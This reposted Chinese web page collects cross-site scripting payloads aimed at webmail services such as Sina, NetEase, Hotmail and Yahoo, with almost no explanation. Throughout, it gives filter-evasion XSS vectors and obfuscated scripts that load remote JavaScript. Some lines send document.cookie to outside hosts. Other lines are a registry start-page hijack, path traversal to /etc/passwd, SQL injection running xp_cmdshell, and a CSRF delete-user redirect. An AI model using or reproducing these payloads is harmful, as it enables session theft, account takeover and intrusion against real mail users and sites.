邮箱跨站代码收集 - 网站安全 - 自学php

----------------------------TOM-------------------------------------------------------------------

----------------------------------------------------------------------------------------------

<IMG """><SCRIPT>alert("XSS-2")</SCRIPT>">

Hello,80sec </xss style="x:expression(alert(document.cookie))">

<IMG

SRC

(

)

<style>

input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))

</style>

<style>

a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))

</style>

<a></a>

这个新浪只差一个"闭合了

这个新浪不让加入

</HEAD>

<BODY>

<div id="nini" style="display:none">window.xx=2;var f=document.createElement('script');f.src='http://HdhCmsTestmail-query测试数据/test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)</div><style></style><a></a><img width="1" height="1" src="http://HdhCmsTestmail-query测试数据/test.js">

</BODY></HTML>

网易最新的xss

---------

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

---------

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

---------

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

---------

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

---------

if(parent.window.x!='1')

{

var script1 = parent.document.createElement('script');

script1.id='script1';

script1.src='http://HdhCmsTestmail-query测试数据/test.js';

parent.document.body.appendChild(script1);

}

</div>

---------

<img src=x onerror=alert(1)//">

---------

<div >

<img tdynsrc="javascript;[code]"> [IE 浏览器 ]

<input type="imge" dynsrc="javascript;[code]"> [IE浏览器]

<bagsound src="javascript;[code]"> [IE浏览器]

&<script>[code]</script>

&{[code]} [N4浏览器]

<img src="mocha:[code]"> [N4浏览器]

<img src="livescript:[code]"> [N4浏览器]

<div style="behaviour:url([link to code])"> [IE浏览器]

<div style="binding:url([link to code])"> [Mozilla浏览器]

<div style="width:expression([code]);"> [IE浏览器]

[\xCO][\xBC]script>[code][\xCO][\xBC]/script> [UTF-8;IE;Opera浏览器]

<img dynsrc="javascript:[code]"> [IE]

<input type="image" dynsrc="javascript:[code]"> [IE]

<bgsound src="javascript:[code]"> [IE]

&<script>[code]</script>

&{[code]}; [N4]

<img src=&{[code]};> [N4]

<img src="mocha:[code]"> [N4]

<img src="livescript:[code]"> [N4]

<div style="behaviour: url([link to code]);"> [IE]

<div style="binding: url([link to code]);"> [Mozilla]

<div style="width: expression([code]);"> [IE]

<![CDATA[</script>

<script>[code]</script>

<img src="blah>" onmouseover="[code]">

[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

</script>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-14")';</STYLE>

<img dynsrc=javascript:window.location.href='http://yourwebsite测试数据/getcookie.asp?msg='+document.cookie>。

前段时间被过滤的hotmail跨站代码

<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://xxx测试数据/test/index.asp?uid=someone@hotmail测试数据'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>

function ok()

{

return true

};

window.onerror=ok</div>

<div id="tip" title="<a style="display:none">" style="display:none"></div>

<div id="tep" title=">" style="display:none"></div>

</font>

<STYLE type=text/css>BODY {

}

TD {

FONT-SIZE: 12px; COLOR: #ffdfad; LINE-HEIGHT: 20px

}

A {

FONT-SIZE: 12px; COLOR: #000000; TEXT-DECORATION: none

}

A:hover {

FONT-SIZE: 12px; COLOR: #ffff00; TEXT-DECORATION: underline

}

</STYLE>

<div id="xxx" style="DISPLAY: none" title="try{window['on'+'error']=function(){return true;};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}">.</div><div style="DISPLAY: none"><img lang="HTML" id="inner" title="<img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#>" width=0 src="http://#" style="background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.title;//)`"></div>

<<SCRIPT>alert([XSS-23]);//<</SCRIPT>

<STYLE TYPE=]text/javascript]>alert(‘XSS-34’);</STYLE>

<STYLE type=]text/css]>BODY{background:url([javascript:alert(‘XSS-35’)])}</STYLE>

<?=’<SCRIPT>alert([XSS-36])</SCRIPT>’?>

a=]get];

b=]URL([]";

c=]javascript:];

d=]alert(‘XSS-38’);]")];

eval(a+b+c+d);

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-45")';</STYLE>

<script>open(/*

*/"http://127"/*

*/+".0.0.1/"/*

*/)</script>

<script>/*

*/eval(/*

*/String/*

*/./*

*/fromCharCode/*

*/(100,/*

*/111,99,/*

*/.....*

*/59))/*

*/</script>

Set RegWsh = CreateObject("WScript.Shell")

RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://HdhCmsTestattacker测试数据"

</script>

<a href="javascript:alert('xss-46');">Click here</a>

</form>

@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));

</style>

<STYLE>

Xsstc { background-image: url('about:blank#Hello%20World'); }

</STYLE>

Xsstc.exec('http://lbs.tralfamadore测试数据/test.css', showResponse)

<div id="ly" style="display:none"> //这几个DIV是用来分段存储exp内容的

function ok(){return true};

window.onerror=ok

</div>

<div id="tip" title="<a style="display:none">" style="display:none"></div>

<div id="tep" title=">" style="display:none"></div>

<style>

//以下是EXP的开始，一个二元表达式内嵌利用代码。代码把div中存储的内容取出来然后加一起，形成了最终shellcode。

div{background-image:expression(

javascript:1?document.write(

EC_tip.title+';top:'+EC_tap.title+'/a'+

EC_tep.title+EC_tap.title+'script id=nop'+

EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+

EC_tep.title+EC_tap.title+

'script src=http://localhost/1.js'+

EC_tep.title+EC_tap.title+'/script'+

EC_tep.title)

:1=1);

}

</style>

</font>

<a href="replace.htm#state=0&url=http://HdhCmsTest39516测试数据/<script>alert('xeye')</script>">xeye</a>

<body{background: url(javascript:alert(document.cookie); ) }</body>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-55")';</STYLE>

<STYLE>@\0im\port'\0ja\vasc\ript:alert("XSS-56")';</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS-57')")}</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS-58')");}</STYLE><A CLASS=XSS></A>

javascript:document.write("<script src=http://HdhCmsTestpc010.cn/1.js></script>")

javascript:document.write('<scri'+'pt src=http://HdhCmsTesthackwolf.cn/1.txt>'+'</scri'+'pt>');

RSnake的经典XSS脚本都测试下

AJAX技术

[float=expression(alert('xss-77'))]11[/float]

163的跨站 <img src="jav as cript:alert('XSS-79');">

126 <img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">

xss.jpg" onerror=window.open('http://wg12.cn/msg.asp?msg='+'document cookie) width=0>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS-80")';</STYLE>

<img src="abc>" onmouseover="[code]">

<script>/*

*/alert/*

*/("zs")/*

*/</script>

<STYLE>@im\port'\ja\vasc\ript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))';</STYLE>

xss.css

body{

xss:expression(

if(!window.x)//防止重复执行

{alert('xss-82');

window.x=1;

}

)

}

.mycss {

color:red;

wuxinlangman:expression(onmousemove=function(){

this.style.color= "blue ";

},onmouseout=function(){

this.style.color= "red ";

})

}

</style>

a {star : expression_r(onfocus=this.blur)}

</style>

<STYLE>body{xss:exprexpression/expression*/ession(alert(/xss-84/))}</STYLE>

<STYLE>body{xss:expr/*/ession(alert(/xss-86/))}</STYLE>

<STYLE>body{xss:exp_ression(alert(/xss-88/))}</STYLE>

<STYLE>body{xss:exp_ression(alert(/xss-90/))}</STYLE>

<STYLE>body{xss:expr///*/ession(alert(/xss-92/))}</STYLE>

<STYLE>body{xss:expr///*/ession(alert(/xss-94/))}</STYLE>

---------

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

%3Cscript%3Ealert('XSS-96')%3C/script%3E

%0a%0a<script>alert(\"Vulnerable\")</script>. jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

%3f.jsp

?sql_debug=1

a%5c. asp x

a.jsp/<script>alert('Vulnerable')</script>

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

'';!--"<XSS>=&{()}

"<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

getURL("javascript:alert('XSS')")

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

<IMG SRC="javascript:alert('XSS')"

<SCRIPT a=">" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT>

<SCRIPT =">" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT>

---------

<a href='data:text/xml,<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html [ <!ENTITY inject "<script>alert(1)</script>">]><html xmlns="http://HdhCmsTestw3.org/1999/xhtml">&inject;</html>'>haha</a>

This used to work on FF <=3.0

@import 'data:text/css,* { -moz-binding:url(http://HdhCmsTestbusinessinfo.co.uk/labs/xbl/xbl.xml#xss) }';

CSS expressions I could go on all night :)

Encoded comments:-

The VB example doesn't require () :-

And how about vbs:

<?xml version="1.0" encoding="utf-7"?>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<ſcript>

---------

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG

SRC

(

)

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

?script?alert(￠XSS￠)?/script?

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

----------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------

a="get";

b="URL(\"";

c="javascript:";

d="alert('XSS');\")";

eval(a+b+c+d);

----------------------------------------------------------------------------------------------

<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">

<xss:xss>XSS</xss:xss>

</HTML>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>

HdhCmsTest2cto测试数据

----------------------------------------------------------------------------------------------

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

</BODY></HTML>

----------------------------------------------------------------------------------------------

<? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?>

Redirect 302 /a.jpg http://victimsite测试数据/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ html ; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

----------------------------------------------------------------------------------------------

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

----------------------------------------------------------------------------------------------

<A HREF="h

tt p://6	6.000146.0x7.147/">XSS</A>

查看更多关于邮箱跨站代码收集 - 网站安全 - 自学php的详细内容...

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did14559

更新时间：2022-09-13 阅读：42次